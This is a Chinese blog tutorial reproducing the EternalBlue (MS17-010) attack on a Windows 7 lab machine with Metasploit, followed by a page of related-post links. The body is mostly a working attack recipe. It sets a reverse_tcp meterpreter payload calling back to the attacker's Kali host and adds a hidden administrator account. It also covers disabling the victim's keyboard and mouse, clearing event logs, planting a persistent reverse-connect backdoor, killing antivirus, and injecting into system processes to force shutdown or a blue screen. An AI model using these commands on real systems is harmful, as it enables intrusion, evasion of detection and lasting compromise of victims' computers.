kali入门到入狱之 永恒之蓝(MS17-010)复现.

已于 2023-11-14 14:23:06 修改
阅读量3.5k 收藏 44
点赞数 29
分类专栏: # 权限提升 || 维持 领域. 文章标签: 安全 linux debian
于 2022-03-15 02:04:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54977781/article/details/123492580
版权

利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,取消户登录,电脑蓝屏等等......

    

免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

   

Kali2021(链接:https://pan.baidu.com/s/1jzaqjiEQVEHQdRRIp72f3Q

提取码:tian )

   

Win7 (32)(链接:https://pan.baidu.com/s/1r7Y3jA4hfb4sTKKh0ubNIw

提取码:tian )

    

实验均为本地虚拟机(kali:192.168.0.114)(win7(32位):192.168.0.115

    

文件:Eternalblue-Doublepulsar-Metasploit-master

(链接:https://pan.baidu.com/s/1MTQaSOrRSrFw_eWmnyr8Dw

提取码:tian )

     

第一步:下载 Eternalblue-Doublepulsar-Metasploit-master ,将其解压放到root目录下重新命名为 Eternalblue-Doublepulsar-Metasploit

    

第二步:把 Eternalblue-Doublepulsar-Metasploit 文件中的 ternalblue_doublepulsar.rb

拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

命令顺序:

(1)cd Eternalblue-Doublepulsar-Metasploit-master        #cd是切换文件目录

(2)cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb     #拷贝

(3)cd /usr/share/metasploit-framework/modules/exploits/windows/smb     #切换文件目录

      

第三步:然后在 cd /usr/share/metasploit-framework/modules/exploits/windows/smb目录下(安装win 32架构)

命令:dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装过程中可能时间比较长,耐心等候.

安装过程中的问题:(1)选择<NO>        (2)选择cron

    

第四步:运行 wine -h

    

第五步:然后再运行 postgresql 数据库

命令:service postgresql start

   

第六步:打开 msfconsole

     

第七步:使用 exploit 模块

命令顺序:

(1)use exploit/windows/smb/eternalblue_doublepulsar        #使用模块

(2)set payload windows/meterpreter/reverse_tcp          #设置payload

(3)show options                       #查看模块信息

(4)set rhosts 192.168.0.115                   #要攻击的受害电脑地址(win7)

(5)set lhost 192.168.0.114                    #本地的kali地址

     

 方法1:  

(6)set processinject explorer.exe       #设置进程注入进入命令行下

(7)run       #攻击

       

(8)execute  -H -i -f cmd.exe       #可以进到受害电脑的命令行下

但你想查看ip地址等信息时出现乱码:

    

(9)输入:chcp 65001

     

(10)切换到受害电脑桌面:cd c:\users\administrator\desktop                                                

将kali里的文件上传文件到受害电脑上:echo > 文件名

受害电脑的效果:

    

(11)添加用户名密码

命令的使用:net user 用户名 密码 /add

命令的使用:net localgroup Administrators 用户名 /add

命令:net user tian3 123456 /add 

命令:net localgroup Administrators tian3 /add 

     

(12)输入:exit 可以退到 meterpreter

    

(13)#开关受害电脑键盘/鼠标:uictl   

#开启或禁止键盘/鼠标:uictl [enable/disable] [keyboard/mouse/all]        

#禁用鼠标: uictl disable mouse

#禁用键盘: uictl disable keyboard

此时受害电脑的鼠标已被禁用

开启已被禁用的鼠标

此时受害电脑的键盘已被禁用

开启已被禁用的键盘

     

(13)#开启受害电脑的远程桌面:run vnc

可以看到受害电脑做干什么.

    

(14)#重新启动受害电脑的计算机:reboot

受害电脑的效果:

    

(15)#清除事件日志:clearev

      

(16)植入后门 :  run  persistence -X -i  5  -p 4444 -r 192.168.0.114

-X 在目标主机上开机自启动

-i  不断尝试反向连接的时间间隔

-r kali的地址

(17)关闭防护软件:run killav

   

方法2:

(6)set processinject lsass.exe       —设置进程注入后1分钟受害电脑关机

受害电脑的效果:  

    

方法3:

(6)set processinject winlogon.exe       --设置进程注入取消受害电脑用户登录

受害电脑的效果:

      

方法4:

(6)set processinject wininit.exe     --设置进程注入受害电脑蓝屏

受害电脑的效果:

  

  

  

参考链接:利用MS17-010渗透win7(32位)_1stPeak's Blog-CSDN博客_永恒之蓝32位利用

  

半个西瓜.
关注
专栏目录
kali简单操作(从入门入狱)
javaProgrammerr的博客
03-08 4498
nmap 当使用nmap扫描一个端口的时候 PORT: 端口 STATE: 端口状态 SERVICE: 端口服务 open: 端口是开放的 closed: 端口是关闭的 filtered: 端口被防火墙IDS/IPS屏蔽,无法确定状态 open|filtered: 端口是开放的或被过滤 指令写法: nmap IP地址 xhydra 可以利用它来对众多协议进行口令.账号.密码的爆破. 支持FTP,MYSQL,SMTP,TELNET,SSH等众多的协议爆破. 使用方法 在终端中输入命令行xhydra 菜单栏一
MS17-010 补丁
05-15
安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
网络安全小白学kali———“永恒之蓝
jennycisp的博客
11-14 236
​​​​​​​​​​​​​​Kali 学得好,牢饭吃得饱!!!不可乱用,只能自己练习和学习使用!!!(法律风险,自己了解噢)
MS17-010漏洞复现+利用
最新发布
Nove1205的博客
07-22 1409
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
Kali学习之从入门入狱(三)
weixin_43457608的博客
11-04 4347
Kali学习之从入门入狱致谢开篇1 Linux 常见目录2 Linux基础命令以及常见用法2.0 环境变量2.1 apt-get 安装2.2 ls ll 和 alias2.3 花式grep3 shell基础4 脚本应用4.1 监测进程并重启脚本5 docker基础以及靶场搭建5.1 docker基础5.2 docker靶场搭建 致谢 大家的催更看到了,我没想到过年那段时间抱着玩玩的心态写的文章会受到大家的喜欢。最近在准备找工作,更新的话随缘吧,等稳定下来一个月至少更新一篇。 开篇 相信看到这里的同学都
Kali学习之从入门入狱(二)
weixin_43457608的博客
01-04 6399
入狱第一步(信息收集)
第二章 常用安全工具
Evil_invisible的博客
01-09 1360
目录 1. Kali系统工具分类 2. Kali Top10工具 1. Kali系统工具分类 信息收集(Information Gathering):主要目的是收集渗透测试目标的基本信息,包括操作系统信息、网络配置信息、应用服务信息等。 脆弱性分析(漏洞发现,Vulnerabilith Analysis):在信息收集的基础上,要需要进行渗透,需要对目标系统或网络的脆弱性(漏洞)进行进一步...
Kali入门入狱——介绍及安装kali Linux
热门推荐
Box_sir的博客
10-01 1万+
Kali入门入狱——安装Kali Linux 什么是kali Kali Linux是基于DebianLinux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripp
Kali linux基础认识和安装(从入门入狱
qq_46472081的博客
09-12 828
Kali Linux是一种基于DebianLinux发行版,专为渗透测试和网络安全评估而设计。通过提供这些工具的集成和预配置,Kali Linux简化了安全测试和渗透测试的过程,并为用户节省了宝贵的时间和精力,使他们能够更专注于评估和保护目标系统和网络。Kali Linux以其强大的工具和功能而闻名,是安全专业人士、道德黑客(白帽子)和网络安全研究人员的绝佳选择。安装Kali Linux虚拟机是一个很好的方式,在一个安全的环境中学习和实践渗透测试和网络安全。当然手机也可以装Kali linux哦!
Kali入门入狱-CC攻击
qq_56418482的博客
01-10 1117
A:指定连接服务器的基本的认证凭据;-c:指定一次向服务器发出请求数;-C:添加cookie;-g:将测试结果输出为“gnuolot”文件;-h:显示帮助信息;-H:为请求追加一个额外的头;-i:使用“head”请求方式;-k:激活HTTP中的“keepAlive”特性;-n:指定测试会话使用的请求数;-p:指定包含数据的文件;-q:不显示进度百分比;-T:使用POST数据时,设置内容类型头;-v:设置详细模式等级;-w:以HTML表格方式打印结果;
入门入狱kali Linux 命令指令
weixin_66727473的博客
11-17 401
【代码】从入门入狱kali Linux 命令指令。
入门入狱Kali Linux安装
刘滨浩的博客
04-06 1332
直接下一步,默认安装在C盘。 安装失败 安装成功后打开
ms17-010
qq_54735393的博客
11-02 391
EhernalBlue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能在电脑和服务器中植入勒索软件。
学完可入狱:《Web渗透测试-基于Kali Linux》经典黑客入门教程
wangluo12138的博客
11-26 1456
网络江湖,风起云涌,攻防博弈,从未间断,且愈演愈烈。
kali入门入狱之 生成木马程序的利用.
网络安全领域___专研者.
03-17 4464
当您忍不住点击一个(美女图片)或(帅哥图片)的时候,或者是您安装一个了来路不明的程序程序时,再或者是您随意点击了一个链接后,可能您的设备已经沦陷了.
virtualbox kalilinux 安装的增强功能20190507(kali入门入狱
爱党人士
05-08 1500
这里有个坑: leafpad 后面是跟着一个小小小小的空格!! 千万不要忘了加! 不然搞不了!! 然后将里面的源去掉, 换成: deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 运行 : apt-get update && apt-get install -y linux-headers...
永恒之蓝 MS17-010
weixin_43726831的博客
11-19 816
WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国...
Metasploitable渗透测试实战:ms17-010
weixin_68951704的博客
05-05 2999
漏洞简介: 永恒之蓝(即ms17-010)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件
入门入狱-------常用模块
weixin_44628421的博客
10-19 288
入门 N day math 普通数学模块 cmath 复数数学模块 random 随机数模块 random.radint (m,n) 产生m~n的随机数 random.random 产生 0~1的随机数,左闭右开区间,取不到1 random.shuffle(序列) 打乱列表的顺序 random.choice(序列) 随机取一个列表中的元素 random.choices(序列,k=N) 随机取N次元素,一次取一个 os 文件/目录方法模块 菜鸟教程地址: https://w
ms17-010永恒之蓝)搭建、攻击、打补丁
weixin_51387754的博客
05-31 3620
前言 写文目的:被问到ms17_010永恒之蓝漏洞怎么修补)? 那么作为网络安全的工作者,胜负欲于是就来了 WIN7虚拟机搭建 我所使用的虚拟机 ed2k://|file|cn_windows_7_ultimate_x64_dvd_x15-66043.iso|3341268992|7DD7FA757CE6D2DB78B6901F81A6907A|/ KALI虚拟机搭建 我所使用的虚拟机 以上两种可在官网自行下载,也可自行复制链接到迅雷进行下载 攻击过程 kali 192.168.80.129 win71
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值